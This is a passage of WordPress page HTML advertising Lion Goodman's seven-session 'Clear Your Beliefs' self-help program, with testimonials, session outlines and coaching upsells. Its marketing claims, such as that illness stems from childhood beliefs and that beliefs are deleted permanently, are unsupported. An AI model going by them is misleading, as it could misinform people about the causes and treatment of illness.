and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, 